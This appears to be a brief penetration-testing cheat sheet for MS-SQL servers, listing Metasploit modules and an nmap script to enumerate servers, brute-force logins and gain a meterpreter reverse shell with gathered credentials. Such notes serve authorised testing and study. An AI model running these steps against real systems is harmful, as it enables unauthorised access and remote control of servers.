MS-SQL

Default Port =1433


=========================Enumerate MSSQL Servers on the network : 
msf > use auxiliary/scanner/mssql/mssql_ping
>>> nmap -sU --script=ms-sql-info $IP

=========================Bruteforce MsSql : 
msf > use auxiliary/scanner/mssql/mssql_login

=========================Gain shell using gathered credentials
msf > use exploit/windows/mssql/mssql_payload
msf > set PAYLOAD windows/meterpreter/reverse_tcp


Last updated